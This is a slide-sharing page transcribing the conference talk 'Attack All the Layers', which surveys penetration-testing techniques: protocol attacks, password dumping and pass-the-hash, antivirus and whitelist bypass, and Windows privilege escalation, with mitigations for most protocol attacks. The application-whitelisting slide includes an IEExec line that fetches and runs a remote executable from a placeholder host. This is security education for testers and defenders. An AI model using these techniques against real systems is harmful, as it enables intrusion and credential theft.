TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
Scott Sutherland
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
Scott Sutherland
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
Scott Sutherland
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Scott Sutherland
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
Scott Sutherland
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
Scott Sutherland
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
Scott Sutherland
 
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
Scott Sutherland
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
Scott Sutherland
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
Scott Sutherland
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
Scott Sutherland
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
Scott Sutherland
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
Declaration of malWARe
Declaration of malWAReDeclaration of malWARe
Declaration of malWARe
Scott Sutherland
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Scott Sutherland
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
Scott Sutherland
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
Scott Sutherland
 

More from Scott Sutherland (19)

Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
 
How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)How to Build and Validate Ransomware Attack Detections (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
 
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
 
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
Declaration of malWARe
Declaration of malWAReDeclaration of malWARe
Declaration of malWARe
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
 

Recently uploaded

JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
Frank van Harmelen
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
Product School
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
Product School
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
Product School
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Tobias Schneck
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
Paul Groth
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
Bhaskar Mitra
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 

Recently uploaded (20)

JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 

Attack All the Layers: What's Working during Pentests (OWASP NYC)

  • 1. Attack All the Layers: What’s Working During Pen Tests Scott Sutherland and Karl Fosaaen
  • 2. Introductions • Scott Sutherland ‒ Principal Security Consultant @ NetSPI ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant @ NetSPI ‒ Twitter: @kfosaaen We specialize in both things and stuff!
  • 3. Overview • Why do Companies Pen Test? • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation • Conclusions
  • 4. Why do companies pen test? • Compliance requirements • Evaluate risks associated with an acquisition or partnership • Validate preventative controls • Validate detective controls • Prioritize internal security initiatives • Proactively prevent breaches
  • 5. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 6. Attacking protocols • ARP: Address Resolution Protocol • NBNS: NetBIOS Name Service • SMB: Server Message Block • PXE: Preboot Execution Environment • DTP: Dynamic Trunking Protocol
  • 8. Attacking protocols: ARP • General ‒MAC to IP association ‒Layer 2 • Conditions ‒Independent of user action ‒Broadcast network • Attacks ‒MITM Monitoring ‒MITM Injection ‒DOS
  • 10. Attacking protocols: ARP • Common mitigating controls: ‒ Dynamic ARP Inspection ‒ Port Security ‒ Static Routes (not recommended)
  • 11. Attacking protocols: NBNS / LLMNR NetBIOS Name Service
  • 12. Attacking protocols: NBNS • General ‒ IP to hostname association ‒ Layer 5 / 7 • Constraints ‒ Dependent on user action ‒ Broadcast Network ‒ Windows Only • Attacks ‒ MITM Monitoring ‒ MITM Injection ‒ DOS
  • 16. Attacking protocols: NBNS • Common mitigating controls: ‒ Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS ‒ Disable NBNS (recommended) • Might cause issues with legacy apps ‒ Disable insecure authentication to help • limit impact of exposed hashes ‒ Enable packet signing to help prevent • SMB Relay attacks
  • 18. Attacking protocols: SMB • General ‒ SMB is the come back kid! ‒ Layer 7 • Constraints ‒ Dependent on user action ‒ Any routable network ‒ No connecting back to originating host • Attacks ‒ Command execution ‒ Shells..aaand shells
  • 20. Attacking protocols: SMB • Historically, SMB Relay has been used to: ‒ Execute arbitrary commands ‒ Obtain shells • Lately the community has been developing tools for doing things like: ‒ LDAP queries ‒ SQL queries ‒ Exchange services ‒ Mounting file systems
  • 21. Attacking protocols: SMB • Common mitigating controls: ‒ Enable packet signing to help prevent SMB Relay attacks ‒ Apply really old patches like if you missed out on the last decade…
  • 23. Attacking protocols: PXE • General ‒ DHCP • Constraints ‒ Broadcast domain • Attacks ‒ Command execution ‒ Access to file system/images
  • 24. Attacking protocols: PXE • Common mitigating controls: ‒ Isolate networks ‒ Add device validation
  • 26. Attacking protocols: DTP • General ‒ 802.1Q encapsulation is in use ‒ Layer 2 • Constraints ‒ Independent of user action ‒ Trunking is set to enabled • or auto on switch port • Attacks ‒ Monitor network traffic for all VLANs, because all VLANs are • allowed on a trunk by default • *Full VLAN hopping
  • 31. Attacking protocols: DTP • Common mitigating controls: ‒ Use dedicated VLAN ID for all trunking ports ‒ Disable all unused ports and place them on a non-routable VLAN ‒ Configure all user ports as access ports to prevent trunk negotiation ‒ Configure frames with two 802.1Q headers ‒ Configure strong VACLs
  • 32. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 33. Attacking passwords • Hashes and Cracking (Offline) • Dictionary Attacks (Online) • Dump in Cleartext!
  • 34. Attacking Passwords Tool Function Year Pass the Hash Passing Hashes 1997 Rainbow Tables Password Cracking 2000s SMB Relay Relaying Captured Hashes 2001 John the Ripper Password Cracking 2001 NetNTLM.pl Cracking Network Hashes 2007 PTH Toolkit Pass all the Hashes 2008 Hashcat CPU and GPU Cracking 2010 WCE and Mimikatz Cleartext Windows Creds 2012
  • 35. Attacking Passwords: Hashes • What are hashes? ‒ A non-reversible way of storing passwords ‒ Operating systems and applications ‒ Lots of types • LM/NTLM • Network and Local • MD5 • SHA • descrypt
  • 36. Attacking Passwords: Hashes • How do we get hashes? ‒ Cain and Abel ‒ fgdump ‒ Metasploit ‒ Mimikatz ‒ Databases ‒ Config files
  • 37. Attacking Passwords: Cracking • Cracking Hashes ‒ Rainbow Tables ‒ John the Ripper ‒ oclHashcat ‒ CPU versus GPU
  • 40. Attacking Passwords: Passing Hashes • Passing Hashes ‒ Metasploit ‒ psexec ‒ winexec ‒ PTH toolkit
  • 41. Attacking Passwords: Dictionary • Online Vs. Offline Attacks • Dictionary Attacks ‒ Enumerate users • Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc. ‒ Attack! • Are users getting smarter? ‒ Sort of… • “Summer2014” meets password • complexity requirements
  • 42. Attacking Passwords: Cleartext • Common application configs • Reversible Formats ‒ Find in files ‒ Groups.xml ‒ Unattend.xml ‒ Registry • WCE • Mimikatz
  • 43. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 44. Attacking Applications: Common • Default and weak passwords • SQL injection • RFI/web shells • Web directory traversals • UNC path injection + SMB relay • Critical missing patches
  • 45. Attacking Applications: Breakouts • Obtain a common dialog box • Bypass folder path and file type restrictions • Bypass file execution restrictions • Bypass file black/white lists • Access to native consoles and management tools • Downloading and use third party applications
  • 46. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 47. Bypassing EPP: Anti-virus • PowerShell code Injection • Execute off network share • Clone resource tables • Modify import tables • Pack files
  • 48. Bypassing EPP: App White List • Execution via approved apps ‒ Powershell Code Injection ‒ Rundll32 mydll,DLLMain@12 ‒ IEExec http://x.x.x.x:8080/bypass.exe • Exceptions ‒ File name ‒ Publisher ‒ Directory • Excessive privileges ‒ Services and policy
  • 49. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 50. Windows Escalation: Overview • Privilege Escalation Goals • Local Privilege Escalation • Domain Privilege Escalation
  • 51. Windows Escalation: Goals • Local Escalation Goals ‒ Find clear text or reversible credentials with local administrative privileges ‒ Get application to run commands as Administrator or LocalSystem • Domain Escalation Goals ‒ Find Domain Admins ‒ Impersonate Domain Admins
  • 52. Windows Escalation: Local • Local Escalation ‒ *Clear text credentials in files, registry, over network ‒ Insecure service paths ‒ DLL preloading ‒ DLL and exe replacement ‒ Binary planting in auto-run locations (reg and file system) ‒ Modifying schedule tasks ‒ *Local and remote exploits ‒ Leverage local application like IIS, SQL Server etc ‒ *UNC path injection + SMB Relay / Capture + crack
  • 53. Windows Escalation: Domain • Domain Escalation – Find DAs ‒ Check locally! (Processes, Tokens, Cachedump) ‒ Review active sessions – netsess (veil) ‒ Review remote processes - tasklist ‒ Service Principal Names (SPN) – get-spn ‒ Scanning Remote Systems for NetBIOS Information - nbtscan ‒ Pass the hash to other systems ‒ PowerShell shell spraying ‒ WINRM/WINRS shell spraying ‒ Psexec shell spraying
  • 54. Windows Escalation: Domain • Domain Escalation – Impersonate DAs ‒ Dump passwords from memory with Mimikatz ‒ Migrate into the Domain Admin’s process ‒ Steal Domain Admins delegation tokens with Incognito ‒ Dump cached domain admin hashes with cachedump ‒ Relatively new techniques • PTH using Kerberos ticket
  • 55.
  • 56. Conclusions • Most Networks ‒ Kind of broken • Most Protocols ‒ Kind of broken • Most Applications ‒ Kind of broken All can kind of be fixed
  • 57. Attack all the layers! • Any questions?
  • 58. Attack all the layers! • Scott Sutherland ‒ Principal Security Consultant ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant ‒ Twitter: @kfosaaen